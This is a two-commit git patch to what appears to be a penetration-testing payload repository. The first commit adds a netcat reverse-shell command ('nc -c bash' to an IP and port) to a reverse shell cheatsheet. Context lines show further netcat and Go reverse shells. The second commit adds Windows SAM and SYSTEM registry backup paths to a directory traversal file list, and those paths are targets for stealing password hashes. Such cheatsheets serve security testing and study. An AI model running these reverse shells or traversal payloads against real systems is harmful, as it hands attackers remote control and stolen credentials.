From b54142c3a29410a7ee19130f80b1b7c6f07a7b85 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Mon, 21 Oct 2019 02:35:13 +0800 Subject: [PATCH 1/2] Update Reverse Shell Cheatsheet.md --- Methodology and Resources/Reverse Shell Cheatsheet.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 57e24be..cf91cc2 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -129,6 +129,7 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp"," ```bash nc -e /bin/sh [IPADDR] [PORT] nc.traditional -e /bin/bash 10.0.0.1 4444 +nc -c bash 10.0.0.1 4444 ``` ### Netcat OpenBsd From bb7e6b7cd0587903fc3040b3699f517fae02b2b0 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Tue, 29 Oct 2019 16:23:39 +0800 Subject: [PATCH 2/2] Update README.md --- Directory Traversal/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 1420178..afa72bd 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -144,6 +144,8 @@ c:/unattend.txt c:/unattend.xml c:/unattended.txt c:/unattended.xml +c:/windows/repair/sam +c:/windows/repair/system ``` The following log files are controllable and can be included with an evil payload to achieve a command execution @@ -164,4 +166,4 @@ The following log files are controllable and can be included with an evil payloa ## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) -* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) \ No newline at end of file +* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)